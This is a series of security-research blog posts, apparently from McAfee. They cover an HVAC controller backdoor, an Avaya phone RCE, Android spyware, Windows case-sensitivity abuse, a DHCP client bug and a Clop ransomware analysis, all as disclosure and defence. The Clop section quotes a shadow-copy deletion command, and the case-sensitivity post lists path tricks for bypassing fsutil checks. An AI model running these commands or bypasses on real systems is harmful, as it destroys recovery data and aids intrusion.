When canioInit is called, we first spawn a new thread and then execute the real canioInit function.  Our new thread opens a socket on UDP port 1337 and listens for very specific commands, such as “bo0 on” to indicate to “turn on binary output 0” or “reset” to put the device back in the user’s control. Based on the commands provided, the “set_io_state” method called by this thread activates the necessary hooking methods to control the I/O as described in the previous section.

Figure 32

With a fully functioning backdoor in the memory space of the Delta software, we had full control of the device with a realistic attack chain. Figure 33 outlines the entire attack.

Figure 33

The entire process above, from sending out the malicious packets to gaining remote control, takes under three minutes, with the longest task being the reboot. Once the attacker has established control, they can operate the device without impacting what information the user is provided, allowing the attacker to stay undetected and granting them ample opportunity to cause serious damage, depending on what kind of hardware the Delta controller manages.

Real World Impact

What is the impact of an attack like this? These controllers are installed in multiple industries around the world. Via Shodan, we have observed nearly 600 internet-accessible controllers running vulnerable versions of the firmware.  We tracked eBMGR devices from February 2019 to April 2019 and found that there were a significant number of new devices available with public IP addresses.

As of early April 2019, 492 eBMGR devices remained reachable via internet-wide scans using Shodan. Of those found, a portion are almost certainly honeypots based on user-applied tags found in the Shodan data, leaving 404 potentially vulnerable victims. If we include other Delta Controls devices using the same firmware and assume a high likelihood they are vulnerable to the same exploit, the total number of potential targets balloons to over 1600. We tracked 119 new internet connected eBMGR devices since February 2019; however, these were outpaced by the 216 devices that have subsequently gone offline. We believe this is a combination of standard practice for ICS systems administrators to connect these devices to the Internet, coupled with a strategy by the vendor (Delta Controls) proactively reaching out to customers to reduce the internet-connected footprint of the vulnerable devices. Most controllers appear to be in North America with the US accountable for 53% of online devices and Canada accounting for 35%. It is worth noting the fact that in some cases the IP address, and hence the geographic location of the device from Shodan, is traced back to an ISP (Internet Service Provider), which could result in skewed findings for locations.

Some industries seem more at risk than others given the accessibility of devices. We were only able to map a small portion of these devices to specific industries, but the top three categories we found were Education, Telecommunications, and Real Estate. Education included everything from elementary schools to universities. In academic settings, the devices were sometimes deployed district-wide, in numerous facilities across multiple campuses. One example is a public-school system in Canada where each school building in the district had an accessible device.  Telecommunications was comprised entirely of ISPs and/or phone companies. Many of these could be due to the ISPs being listed as a service provider. The real estate category generally included office and apartment buildings. From available metadata in the search results, we also managed to find instances of education, healthcare, government, food, hospitality, real estate, child care and financial institutions using the vulnerable product.

With a bit more digging, we were easily able to find other targets through publicly available information. While it is not common practice to post sensitive documents online, we’ve found many documents available that indicate that these devices are used as part of the company’s building automation plans. This was particularly true for government buildings where solicitations for proposals are issued to build the required infrastructure. All-in-all we have collected around 20 documents that include detailed proposals, requirements, pricing, engineering diagrams, and other information useful for reconnaissance. One particular government building had a 48-page manual that included internal network settings of the devices, control diagrams, and even device locations.

Redacted network diagram found on the Internet specifying ICS buildout

What does it matter if an attacker can turn on and off someone’s AC or heat?  Consider some of the industries we found that could be impacted. Industries such as hospitals, government, and telecommunication may have severe consequences when these systems malfunction. For example, the eBMGR is used to maintain positive/negative pressure rooms in medical facilities or hospitals, where the slightest change in pressurization could have a life-threating impact due to the spread of airborne diseases.  Suppose instead a datacenter was targeted. Datacenters need to be kept at a cool temperature to ensure they do not overheat. If an attacker were to gain access to the vulnerable controller and use it to raise heat to critical levels and disable alarms, the result could be physical damage to the server hardware in mass, as well as downtime costs, not to mention potential permanent loss of critical data.  According to the Ponemon Institute (https://www.ponemon.org/library/2016-cost-of-data-center-outages), the average cost of a datacenter outage was as high as $740,357 in 2016 and climbing. Microsoft was a prime example of this; in 2018, the company suffered a massive datacenter outage (https://devblogs.microsoft.com/devopsservice/?p=17485) due to a cooling failure, which impacted services for around 22 hours.

To show the impact beyond LED lights flashing, McAfee’s ATR contracted a local Delta installer to build a small datacenter simulation with a working Delta system. This includes both heating and cooling elements to show the impact of an attack in a true HVAC system. In this demonstration we show both normal functionality of the target system, as well as the full attack chain, end-to-end, by raising the temperature to dangerous levels, disabling critical alarms and even faking the controller into thinking it is operating normally. The video below shows how this simple unpatched vulnerability could have devastating impact on real systems.

We also leverage this demo system, now located in our Hillsboro research lab, to highlight how an effective patch, in this case provided by Delta Controls, is used to immediately mitigate the vulnerability, which is ultimately our end goal of this research project.

Conclusion

Discoveries such as CVE-2019-9569 underline the importance of secure coding practices on all devices. ICS devices such as this Delta building manager control critical systems which have the potential to cause harm to businesses and people if not properly secured.

There are some best practices and recommendations related to the security of products falling into nonstandard environments such as industrial controls. Based on the nature of the devices, they may not have the same visibility and process control as standard infrastructure such as web servers, endpoints and networking equipment. As a result, industrial control hardware like the eBMGR PLC may be overlooked from various angles including network or Internet exposure, vulnerability assessment and patch management, asset inventory, and even access controls or configuration reviews. For example, a principle of least privilege policy may be appropriate, and a network isolation or protected network segment may help provide boundaries of access to adversaries. An awareness of security research and an appropriate patching strategy can minimize exposure time for known vulnerabilities. We recommend a thorough review and validation of each of these important security tenants to bring these critical assets under the same scrutiny as other infrastructure.

One goal of the McAfee Advanced Threat Research team is to identify and illuminate a broad spectrum of threats in today’s complex and constantly evolving landscape. As per McAfee’s vulnerability public disclosure policy, McAfee’s ATR informed and worked directly with the Delta Controls team.  This partnership resulted in the vendor releasing a firmware update which effectively mitigates the vulnerability detailed in this blog, ultimately providing Delta Controls’ consumers with a way to protect themselves from this attack. We strongly recommend any businesses using the vulnerable firmware version (571848 or prior) update as soon as possible in line with your patch policy and testing strategy. Of special importance are those systems which are Internet-facing. McAfee customers are protected via the following signature, released on August 6th: McAfee Network Security Platform 0x45d43f00 BACNET: Delta enteliBUS Manager (eBMGR) Remote Code Execution Vulnerability.

We’d like to take a minute to recognize the outstanding efforts from the Delta Controls team, which should serve as a poster-child for vendor/researcher relationships and the ability to navigate the unique challenges of responsible disclosure.  We are thrilled to be collaborating with Delta, who have embraced the power of security research and public disclosure for both their products as well as the common good of the industry. Please refer to the following statement from Delta Controls which provides insight into the collaboration with McAfee and the power of responsible disclosure.

The post HVACking: Understanding the Delta Between Security and Reality appeared first on McAfee Blogs.

Avaya Deskphone: Decade-Old Vulnerability Found in Phone’s Firmware

Avaya is the second largest VOIP solution provider (source) with an install base covering 90% of the Fortune 100 companies (source), with products targeting a wide spectrum of customers, from small business and midmarket, to large corporations. As part of the ongoing McAfee Advanced Threat Research effort into researching critical vulnerabilities in widely deployed software and hardware, we decided to have a look at the Avaya 9600 series IP Deskphone. We were able to find the presence of a Remote Code Execution (RCE) vulnerability in a piece of open source software that Avaya likely copied and modified 10 years ago, and then failed to apply subsequent security patches to. The bug affecting the open source software was reported in 2009, yet its presence in the phone’s firmware remained unnoticed until now. Only the H.323 software stack is affected (as opposed to the SIP stack that can also be used with these phones), and the Avaya Security Advisory (ASA) can be found here ASA-2019-128.

The video below demonstrates how an attacker can leverage this bug to take over the normal operation of the phone, exfiltrate audio from its speaker phone, and potentially “bug” the phone. The current attack is conducted with the phone directly connected to an attacker’s laptop but would also work via a connection to the same network as a vulnerable phone. The full technical details can be found here, while the rest of this article will give a high-level overview on how this bug was found and some consideration regarding its resolution. The firmware image Avaya published on June 25th resolves the issue and can be found here. As a user, you can verify if your Deskphone is vulnerable: first determine if you have one of the affected models (9600 Series, J100 Series or B189), then you can find which firmware version your phone is using in the “About Avaya IP Deskphone” screen under the Home menu, version 6.8.1 and earlier are vulnerable when using a H.323 firmware (SIP versions are not affected).

What are Researchers Looking for?

When studying the security of embedded and IoT devices, researchers generally have a couple of goals in mind to help kickstart their research. In most cases, two of the main targets are recovering the files on the system so as to study how the device functions, and then finding a way to interact directly with the system in a privileged fashion (beyond what a normal user should be able to do). The two can be intertwined, for instance getting a privileged access to the system can enable a researcher to recover the files stored on it, while recovering the files first can show how to enable a privileged access.

In this case, recovering the files was straightforward, but gaining a privileged access required a little more patience.

Recovering the Files From the Phone

When we say recovering the files from the phone, we mean looking for the operating system and the various pieces of software running on it. User files, e.g. contacts, settings and call logs, are usually not of interest to a security researcher and will not be covered here. To recover the files, the easiest approach is to look for firmware updates for the device. If we are lucky, they will be freely available and not encrypted. In most cases, an encrypted firmware does not increase the security of the system but rather raises the barrier of entry for security researchers and attackers alike. In this case, we are in luck, Avaya’s website serves firmware updates for its various phone product lines and anyone can download them. The download contains multiple tar files (a type of archive file format). We can then run a tool called binwalk on the extracted files. Binwalk is a large dictionary of patterns that represents known file formats; given an unknown firmware file, it will look for any known pattern and, upon finding potential matches, will attempt to process them accordingly. For instance, if it finds what looks like a .zip file inside the firmware, it will try to unzip it. Running this tool is always a good first step when facing an unknown firmware file as, in most cases, it will identify useful items for you.

When processing the phone’s firmware, extracting the files and running binwalk on them gave us the program the phone runs at startup (the bootloader), the Linux kernel used by the phone, and a JFFS filesystem that contains all the phone’s binaries and configuration files. This is a great start, as from there we can start understanding the inner workings of the device and look for bugs.  At this stage however, we are limited to performing a static analysis: we can look at the files and peek at the assembly instructions of various binaries, but we cannot execute them. To make life easier, there are usually two options. The first one is to emulate the whole phone, or at least some region of interest, while the other is to get a privileged access to the system, to inspect what is running on it as well as run debugging tools. Best results come when you mix and match all these options appropriately. For the sake of simplicity, we will only cover the latter, but both were used in various ways to help us in our research.

Getting the Privileged Access

In most cases, when talking about gaining privileged access to an IoT/embedded device, security researchers are on the lookout for an administrative interface called a root shell that lets them execute any code they want with the highest level of privilege. Sometimes, one is readily available for maintenance purposes; other times more effort is required to gain access to it, assuming one is present in the first place. This is when hardware hacking comes into play; security researchers love to rip open devices and void warranties, looking for potential debug ports, gatekeepers of the sought-after privileged access.

Close up of the phone’s circuit board. UART ports in Red and the EEPROM in blue

In the picture above, we can see two debug ports labeled UART0 and UART1. This type of test point, where the copper is directly exposed, is commonly used during the manufacturing process to program the device or verify everything is working properly. UART stands for Universal Asynchronous Receiver-Transmitter and is meant for two-way communication. This is the most likely place where we can find the administrative access we are looking for. By buying a $15 cable that converts UART to USB and soldering wires onto the test pads, we can see debug information being printed on screen when the phone boots up, but soon the flow of debug information dries up. This is a curious behavior—why stop the debug messages?—so we need to investigate more. By using a disassembler to convert raw bytes into computer instructions, we can peek into the code of the bootloader recovered earlier and find out that during the boot process the phone fetches settings from external memory to decide whether the full set of debug features should be enabled on the serial console. The external memory is called an EEPROM and is easily identifiable on the board, first by its shape and then by the label printed on it. Labels on electronic components are used to identify them and to retrieve their associated datasheet, the technical documentation describing how to use the chip from an electrical engineering standpoint. Soldering wires directly to the chip under a microscope, and connecting it to a programmer (a $30 gizmo called a buspirate), allows us to change the configuration stored on it and enable the debug capabilities of the phone.

EEPROM ready to be re-programmed

Rebooting the phones gives us much more debug information and, eventually, we are greeted with the root shell we were after.

Confirmation we have a root shell. Unrelated debug messages are being printed while we are invoking the “whoami” command

Alternative Roads

The approach described above is fairly lengthy and is only interesting to security researchers in a similar situation. A more generic technique would be to directly modify the filesystem by altering the flash storage (a NAND Flash on the back of the circuit board) as we did for previous research, and then automatically start an SSH server or a remote shell. Another common technique is to tamper with the NAND flash while the filesystem is loading in memory, to get the bootloader in an exception state that will then allow the researcher to modify the boot arguments of the Linux kernel. Otherwise, to get remote shell access, using an older firmware with known RCE vulnerabilities is probably the easiest method to consider; it can be a good starting point for security researchers and is not threatening to regular users as they should already have the most up-to-date software. All things considered, these methods are not a risk to end-users and are more of a stepping stone for security researchers to conduct their research.

In Search of Vulnerabilities

After gaining access to a root shell and the ability to reverse engineer the files on the phone, we are faced with the open-ended task to look for potentially vulnerable software. As the phone runs Linux, the usual command line utilities people use for administering Linux systems are readily available to us. It is natural to look at the list of processes running, find the ones having network connection and so forth. While poking around, it becomes clear that one of the utilities, dhclient, is of great interest. It is already running on the system and handles network configuration (the so-called DHCP requests to configure the phone’s IP address). If we invoke it in the command line, the following is printed:

Showing a detailed help screen describing its expected arguments is normal behavior, but a 2004-2007 copyright is a big red flag. A quick search confirms that the 4.0.0 version is more than 10 years old and, even worse, an exploit targeting it is publicly available. Dhclient code is open source, so finding the differences between two successive version is straightforward. Studying the exploit code and how the bug was patched helps us to narrow down which part of the code could be vulnerable. By once again using a disassembler, we confirm the phone’s version of dhclient is indeed vulnerable to the bug reported in 2009. Converting the original exploit to make it work on the phone requires a day or two of work, while building the proof of concept demonstrated in the above video is a matter of mere hours. Indeed, all the tools to stream audio from the phone to a separate machine are already present on the system, which greatly reduces the effort to create this demo. We did not push the exploitation further than the Proof of Concept shown in the above video, but we can assume that at this point, building a weaponized version able to threaten private networks is more of a software engineering task and a skilled attacker might only need a few weeks, if not days, to put one together.

Remediation

Upon finding the flaw, we immediately notified Avaya with detailed instructions on how to reproduce the bug and suggested fixes. They were able to fix, test and release a patched firmware image in approximately two months. At the time of publication, the fix will have been out for more than 30 days, leaving IT administrators ample time to deploy the new image. In a large enterprise setting, it is pretty common to first have a testing phase where a new image is being deployed to selected devices to ensure no conflict arises from the deployment. This explains why the timeline from the patch release to deployment to the whole fleet may take longer than what is typical in consumer grade software.

Conclusion

IoT and embedded devices tend to blend into our environment, in some cases not warranting a second thought about the security and privacy risks they pose. In this case, with a minimal hardware investment and free software, we were able to uncover a critical bug that remained out-of-sight for more than a decade. Avaya was prompt to fix the problem and the threat this bug poses is now mitigated, but it is important to realize this is not an isolated case and many devices across multiple industries still run legacy code more than a decade old. From a system administration perspective, it is important to consider all these networked devices as tiny black-box computers running unmanaged code which should be isolated and monitored accordingly. The McAfee Network Security Platform (NSP) detects this attack as “DHCP: Subnet Mask Option Length Overflow” (signature ID: 0x42601100), ensuring our customers remain protected. Finally, for the technology enthusiasts reading this, the barrier of entry to hardware hacking has never been this low, with plenty of online resources and cheap hardware to get started. Looking for this type of vulnerability is a great entry point to information security and will help make the embedded world a safer place.

The post Avaya Deskphone: Decade-Old Vulnerability Found in Phone’s Firmware appeared first on McAfee Blogs.

MoqHao Related Android Spyware Targeting Japan and Korea Found on Google Play

The McAfee mobile research team has found a new type of Android malware for the MoqHao phishing campaign (a.k.a. XLoader and Roaming Mantis) targeting Korean and Japanese users. A series of attack campaigns are still active, mainly targeting Japanese users. The new spyware has very different payloads from the existing MoqHao samples. However, we found evidence of a connection between the distribution method used for the existing campaign and this new spyware. All the spyware we found this time pretends to be security applications targeting users in Japan and Korea. We discovered a phishing page related to DNS Hijacking attack, designed to trick the user into installing the new spyware, distributed on the Google Play store.

Fake Japanese Security Apps Distributed on Google Play

We found two fake Japanese security applications. The package names are com.jshop.test and com.jptest.tools2019. These packages were distributed on the Google Play store. The number of downloads of these applications was very low. Fortunately, the spyware apps had been immediately removed from the Google Play store, so we acquired the malicious bullets thanks to the Google Android Security team.

Figure 1. Fake security applications distributed on Google Play

This Japanese spyware has four command and control functions. Below is the server command list used with this spyware. The spyware attempts to collect device information like IMEI and phone number and steal SMS/MMS messages on the device. These malicious commands are sent from a push service of Tencent Push Notification Service.

Figure 2. Command registration into mCommandReceiver

Table 1. The command lists

*1 Not implemented correctly due to the difference from the functionality guessed from the command name

We believe that the cybercriminal included minimal spyware features to bypass Google’s security checks to distribute the spyware on the Google Play store, perhaps with the intention of adding additional functionality in future updates, once approved.

Fake Korean Police Apps

Following further investigation, we found other very similar samples to the above fake Japanese security applications, this time targeting Korean users. A fake Korean police application disguised itself as an anti-spyware application. It was distributed with a filename of cyber.apk on a host server in Taiwan (that host has previously been associated with malicious phishing domains impersonating famous Japanese companies). It used the official icon of the Korean police application and a package name containing ‘kpo’, along with references to com.kpo.scan and com.kpo.help, all of which relate to the Korean police.

Figure 3. This Korean police application icon was misappropriated

The Trojanized package was obfuscated by the Tencent packer to hide its malicious spyware payload. Unlike the existing samples used in the MoqHao campaign, where the C&C server address was simply embedded in the spyware application; MoqHao samples hide and access the control server address via Twitter accounts.

The malware has very similar spyware functionality to the fake Japanese security application. However, this one features many additional commands compared to the Japanese one. Interestingly, the Tencent Push Service is used to issue commands to the infected user.

Figure 4. Tencent Push Service

The code and table below show characteristics of the server command and content list.

Figure 5. Command registration into mCommandReceiver

Table 2. The command lists

*1 Seems to be under construction due to the difference from the functionality guessed from the command name

There are several interesting functions implemented in this spyware. To execute an automated phone call function on a default calling application, KAutoService class has an implementation to check content in the active window and automatically click the start call button.

Figure 6. KAutoSevice class clicks start button automatically in the active calling application

Another interesting function attempts to disable anti-spam call applications (e.g. whowho – Caller ID & Block), which warns users if it is suspicious in the case of incoming calls from an unknown number. The disable function of these call security applications in the spyware allows cyber criminals to make a call without arousing suspicion as no alert is issued from the anti-spam call apps, thus increasing the success of social engineering.

Figure 7. Disable anti-spam-call applications

Figure 8. Disable anti-spam-call applications

Table 3. List of disabled anti-spam call applications

Connection with Active MoqHao Campaigns

The malware characteristics and structures are very different from the existing MoqHao samples. We give special thanks to @ZeroCERT and @ninoseki, without who we could not have identified the connection to the active MoqHao attack and DNS hijacking campaigns. The server script on the phishing website hosting the fake Chrome application leads victims to a fake Japanese security application on the Google Play store (https://play.google.com/store/apps/details?id=com.jptest.tools2019) under specific browser conditions.

Figure 9. The server script redirects users to a fake security application on Google Play (Source: @ninoseki)

There is a strong correlation between both the fake Japanese and Korean applications we found this time. This malware has common spy commands and shares the same crash report key on a cloud service. Therefore, we concluded that both pieces of spyware are connected to the ongoing MoqHao campaigns.

Conclusion

We believe that the spyware aims to masquerade as a security application and perform spy activities, such as tracking device location and eavesdropping on call conversations. It is distributed via an official application store that many users trust. The attack campaign is still ongoing, and it now features a new Android spyware that has been created by the cybercriminals. McAfee is working with Japanese law enforcement agencies to help with the takedown of the attack campaign. To protect your privacy and keep your data from cyber-attacks, please do not install apps from outside of official application stores. Keep firmware up to date on your device and make sure to protect it from malicious apps by installing security software on it.

McAfee Mobile Security detects this threat as Android/SpyAgent and alerts mobile users if it is present, while protecting them from any data loss. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com

Appendix – IOCs

Table 4. Fake Japanese security application IOCs

Table 5. Fake Korean police application IOCs

The post MoqHao Related Android Spyware Targeting Japan and Korea Found on Google Play appeared first on McAfee Blogs.

The Twin Journey, Part 2: Evil Twins in a Case In-sensitive Land

In the first of this 3-part blog series, we covered the implications of promoting files to “Evil Twins” where they can be created and remain in the system as different entities once case sensitiveness is enabled.

In this 2nd post we try to abuse applications that do not work well with CS changes, abusing years of “normalization” assumptions.

It is worth noting that the impact of this change will vary depending on the target folder.

Out of the box, Windows provides a tool to change CS information by invoking the underlying API NtSetFileInformation with FILE_CASE_SENSITIVE_INFORMATION flags.

This tool contains several checks at user-mode level to restrict the target folder but, as usual, it can be easily bypassed using different path combinations. It is possible to create a tool or invoke the API from PowerShell to remove these checks.

Let us go over the following scenarios:

  • Changing ROOT drive CS:
    1. fsutil restrictions will be bypassed and most of the console will not work unless you specify full paths (mostly due to environment variables broken on case-sensitiveness).

  • Combinations to bypass this check include:
    • \\?\C:\ (by drive letter with long path)
    • \\.\BootPartition\\  (by partition)
    • \\?\Volume{3fb4edf7-edf1-4083-84f8-7fbca215bfee}\ (volume id)
  • Change “protected folders” CS.
    1. For some folders is not enough to be Administrator, but to have other type of ACL’s instead.
    2. TrustedInstaller has the required permissions to do so and… you just need Admin permissions to change the service path:

If you change Windows folder case sensitiveness by using the same technique, Windows will not boot anymore.

These scenarios introduce new unexpected behaviors in the current applications, like for instance:

  • There is a folder with CS enabled and two directories with the same name, different case.
  • Trying to change CS will fail due to “multiple files/folders with the same name already exists” check.
  • Move to recycle bin on one of the folders.
  • Change CS of the folder.
  • Restore the deleted file.
  • The contents of the deleted file overwrite the one originally kept.

Screenshots

Left: Root drive with case sensitive enabled.

Right: Program Files CS changed thanks to Trusted Installer ACL. If an application is not considering the proper case, next time it tries to execute a binary whose name may be normalized (to uppercase) it can spawn a different app.

Watch the video recorded by our expert Cedric Cochin illustrating this technique:

Protection and Detection with McAfee Products

  • Products that rely on SysCore will protect C:\ from case sensitive changes
  • Endpoint Security Expert Rules
  • Active Response:
    • Create a custom collector to query Case sensitiveness of important folders.
    • Search for fsutil executions (or even History Processes if that collector is part of your Active Response version)
      • “Processes where Processes name equals fsutil.exe”
    • MVISION EDR:
      • Realtime search
        • “Processes where Processes name equals fsutil.exe”
      • Search for fsutil execution in the historical view

Artifacts involved:

  • NT attributes change
  • Fsutil execution
  • Trusted Installer service changes

Outcomes for this technique include:

  • A ransomware could create C:\Windows\SYSTEM32 and cause a BSOD on next restart
  • Change dll being loaded or an event stops application from starting

The post The Twin Journey, Part 2: Evil Twins in a Case In-sensitive Land appeared first on McAfee Blogs.

DHCP Client Remote Code Execution Vulnerability Demystified

CVE-2019-0547

CVE-2019-0547 was the first vulnerability patched by Microsoft this year. The dynamic link library, dhcpcore.dll, which is responsible for DHCP client services in a system, is vulnerable to malicious DHCP reply packets.

This vulnerability allows remote code execution if the user tries to connect to a network with a rogue DHCP Server, hence making it a critical vulnerability.

DHCP protocol overview

DHCP is a client-server protocol used to dynamically assign IP address when a computer connects to a network. DHCP server listens on port 67 and is responsible for distributing IP addresses to DHCP clients and allocating TCP/IP configuration to endpoints.

The DHCP hand shake is represented below:

During DHCP Offer and DHCP Ack, the packet contains all the TCP/IP configuration information required for a client to join the network. The structure of a DHCP Ack packet is shown below:

The options field holds several parameters required for basic DHCP operation. One of the options in the Options field is Domain Search (type field is 119).

Domain Search Option field (RFC 3397)

This option is passed along with OFFER and ACK packets to the client to specify the domain search list used when resolving hostnames using DNS. The format of the DHCP option field is as follows:

To enable the searchlist to be encoded compactly, searchstrings in the searchlist are concatenated and encoded.

A list of domain names, such as  www.example.com and dns.example.com are encoded thus:

Vulnerability

There is a vulnerability in the DecodeDomainSearchListData function of dhcpcore.dll.

The DecodeDomainSearchListData function decodes the encoded search list option field value. While decoding, the function calculates the length of the decoded domain name list and allocates memory and copies the decoded list.

A malicious user can create an encoded search list, such that when DecodeDomainSearchListData function decodes, the resulting length is zero. This will lead to heapalloc with zero memory, resulting in an out-of-bound write.

Patch

The patch includes a check which ensures the size argument to HeapAlloc is not zero. If zero, the function exits.

Conclusion

A rogue DHCP server in the network can exploit this vulnerability, by replying to the DHCP request from the clients. This rogue DHCP server can also be a wireless access point which a user connects. Successful exploitation of this vulnerability can trigger a code execution in the client and take control of the system.

McAfee NSP customers are protected from this attack by signature “0x42602000”.

The post DHCP Client Remote Code Execution Vulnerability Demystified appeared first on McAfee Blogs.

Clop Ransomware

This new ransomware was discovered by Michael Gillespie on 8 February 2019 and it is still improving over time. This blog will explain the technical details and share information about how this new ransomware family is working. There are some variants of the Clop ransomware but in this report, we will focus on the main version and highlight part of those variations. The main goal of Clop is to encrypt all files in an enterprise and request a payment to receive a decryptor to decrypt all the affected files. To achieve this, we observed some new techniques being used by the author that we have not seen before. Clearly over the last few months we have seen more innovative techniques appearing in ransomware.

Clop Overview

The Clop ransomware is usually packed to hide its inner workings. The sample we analyzed was also signed with the following certificate in the first version (now revoked):

FIGURE 1. Packer signed to avoid av programs and mislead the user

Signing a malicious binary, in this case ransomware, may trick security solutions to trust the binary and let it pass. Although this initial certificate was revoked in a few days, another version appeared soon after with another certificate:

FIGURE 2. New certificate in new version

This sample was discovered by MalwareHunterTeam (https://twitter.com/malwrhunterteam) on the 26 February, 2019.

We discovered the following Clop ransomware samples which were signed with a certificate:

This malware is prepared to avoid running under certain conditions, for example in the first version it requests to be installed as a service; if that will not succeed, it will terminate itself.

The malware’s first action is to compare the keyboard of the victim computer using the function “GetKeyboardLayout”  against the hardcoded values.

This function returns the user keyboard input layout at the moment the malware calls the function.

The malware checks that the layout is bigger than the value 0x0437 (Georgian), makes some calculations with the Russian language (0x0419) and with the Azerbaijan language (0x082C). This function will return 1 or 0, 1 if it belongs to Russia or another CIS country, or 0 in every other case.

FIGURE 3. Checking the keyboard layout

If the function returns 0, it will go to the normal flow of the malware, otherwise it will get the device context of the entire screen with the function “GetDC”. Another condition will come from the function “GetTextCharset” that returns the font used in the system if it does not have the value 0xCC (RUSSIAN_CHARSET). If it is the charset used, the malware will delete itself from the disk and terminate itself with “TerminateProcess” but if it is not this charset, it will continue in the normal flow This double check circumvents users with a multisystem language, i.e. they have the Russian language installed but not active in the machine to avoid this type of malware.

FIGURE 4. Check the text charset and compare with Russian charset

The code that is supposed to delete the ransomware from the disk contains an error. It will call directly to the prompt of the system without waiting for the malware to finish.  This means that the execution of the command will be correct but, as the malware is still running, it will not delete it from the disk. This happens because the author did not use a “timeout” command.

FIGURE 5. Deletion of the malware itself

The next action of the malware is to create a new thread that will start all processes. With the handle of this thread, it will wait for an infinite amount of time to finish with the “WaitForSingleObject” function and later return to the winMain function and exit.

This thread’s first action is to create a file called “Favorite” in the same folder as the malware. Later, it will check the last error with “GetLastError” and, if the last error was 0,  it will wait with the function “Sleep” for 5 seconds.

Later the thread will make a dummy call to the function “EraseTape” with a handle of 0, perhaps to disturb the emulators because the handle is put at 0 in a hardcoded opcode, and later a call to the function “DefineDosDeviceA” with an invalid name that returns another error. These operations will make a loop for 666000 times.

FIGURE 6. Loop to disturb the analysis

The next action is to search for some processes with these names:

  • SBAMTray.exe (Vipre antivirus product)
  • SBPIMSvc.exe (Sunbelt AntiMalware antivirus product)
  • SBAMSvc.exe (GFI AntiMalware antivirus product)
  • VipreAAPSvc.exe (Vipre antivirus product)
  • WRSA.exe (WebRoot antivirus product)

If some of these processes are discovered, the malware will wait 5 seconds using “Sleep” and later another 5 seconds. After those “sleep”, the malware will continue with their normal flow. If these processes are not detected, it will access to their own resources and extract it with the name “OFFNESTOP1”. That resource is encrypted but has inside a “.bat” file.

FIGURE 7. Access to the first resource crypted

The decryption is a simple XOR operation with bytes from this string:

“Po39NHfwik237690t34nkjhgbClopfdewquitr362DSRdqpnmbvzjkhgFD231ed76tgfvFAHGVSDqhjwgdyucvsbCdigr1326dvsaghjvehjGJHGHVdbas”.

The next action is to write this batch file in the same folder where the malware stays with the function “CreateFileA”.  The file created has the name “clearsystems-11-11.bat”. Later will launch it with “ShellExecuteA”, wait for 5 seconds to finish and delete the file with the function “DeleteFileA”.

It is clear that the authors are not experienced programmers because they are using a .bat file for the next actions:

  • Delete the shadow volumes with vssadmin (“vssadmin Delete Shadows /all /quiet”).
  • Resize the shadow storage for all units starting from C to H units’ letters (hardcoded letters) to avoid the shadow volumes being made again.
  • Using bcedit program to disable the recovery options in the boot of the machine and set to ignore any failure in the boot warning the user.

All these actions could have been performed in the malware code itself, without the need of an external file that can be detected and removed.

FIGURE 8. The BAT file to disable the shadow volumes and more security

The next action is to create a mutex with the name hardcoded “Fany—Fany—6-6-6” and later make a call to the function “WaitForSingleObject” and check the result with 0.  If the value is 0 it means that the mutex was created for this instance of the malware but if it gets another value, it means that the mutex was made from another instance or vaccine and, in this case, it will finish the execution of the malware.

After this, it will make 2 threads, one of them to search for processes and the another one to crypt files in the network shares that it has access to.

The first thread enumerates all processes of the system and creates the name of the process in upper case and calculates a hash with the name and compares it with a big list of hashes. This hash algorithm is a custom algorithm. It is typical in malware that tries to hide what processes they are looking for. If it finds one of them it will terminate it with “TerminateProcess” function after opening with the rights to make this action with “OpenProcess” function.

The malware contains 61 hard-coded hashes of programs such as “STEAM.EXE”, database programs, office programs and others.

Below, the first 38 hashes with the associated process names. These 38 processes are the most usual processes to close as we have observed with other ransomwares families such as GandCrab, Cerber, etc.

This thread runs in an infinite loop with a wait using the function “Sleep” per iteration of 30 minutes.

FIGURE 9. Thread to kill critical processes to unlock files

The second thread created has the task of enumerating all network shares and crypts files in them if the malware has access to them.

For executing this task, it uses the typical API functions of the module “MPR.DLL”:

  • WNetOpenEnumW
  • WNetEnumResourceW
  • WNetCloseEnum

This thread starts creating a reserve of memory with “GlobalAlloc” function to keep the information of the “MPR” functions.

For each network share that the malware discovers, it will prepare to enumerate more shares and crypt files.

For each folder discovered, it will enter it and search for more subfolders and files. The first step is to check the name of the folder/file found against a hardcoded list of hashes with the same algorithm used to detect the processes to close.

Below are the results of 12 of the 27 hashes with the correct names:

If it passes, it will check that the file is not a folder, and in this case compare the name with a list of hardcoded names and extensions that are in plain text rather than in hash format:

  • ClopReadMe.txt
  • ntldr
  • NTDLR
  • boot.ini
  • BOOT.INI
  • ntuser.ini
  • NTUSER.INI
  • AUTOEXEC.BAT
  • autoexec.bat
  • .Clop
  • NTDETECT.COM
  • ntdetect.com
  • .dll
  • .DLL
  • .exe
  • .EXE
  • .sys
  • .SYS
  • .ocx
  • .OCX
  • .LNK
  • .lnk
  • desktop.ini
  • autorun.inf
  • ntuser.dat
  • iconcache.db
  • bootsect.bak
  • ntuser.dat.log
  • thumbs.db
  • DESKTOP.INI
  • AUTORUN.INF
  • NTUSER.DAT
  • ICONCACHE.DB
  • BOOTSECT.BAK
  • NTUSER.DATA.LOG
  • THUMBS.DB

This check is done with a custom function that checks character per character against all the list. It is the reason for having the same names in both upper and lower case, instead of using the function “lstrcmpiA,” for example, to avoid some hook in this function preventing the file from being affected. The check of the extension at the same time is to make the process of crypto quicker. Of course, the malware checks that the file does not have the name of the ransom note and the extension that it will put in the crypted file. Those blacklisted extensions will help the system avoid crashing during the encryption compared with other ransomware families.

FIGURE 10. Check of file names and extensions

This behavior is normal in ransomware but the previous check against hardcoded hashes based on the file/folder name is weird because later, as we can see in the above picture, the next check is against plain text strings.

If it passes this check, the malware will make a new thread with a struct prepared with a hardcoded key block, the name of the file, and the path where the file exists. In this thread the first action is to remove the error mode with “SetErrorMode” to 1 to avoid an error dialog being shown to the user if it crashes. Later, it will prepare the path to the file from the struct passed as argument to the thread and change the attributes of the file to ARCHIVE with the function “SetFileAttributesW”, however the malware does not check if it can make this action with success or not.

Later it will generate a random AES key and crypt each byte of the file with this key, next it will put the mark “Clop^_” at the end of the file, after the mark it will put the key used to crypt the file ciphered with the master RSA key that has hardcoded the malware to protect it against third party free decryptors.

The malware can use 2 different public RSA keys: one exported using the crypto api in a public blob or using the embedded in base64 in the malware. The malware will only use the second one if it cannot create the crypto context or has some problem with the crypto api functions.

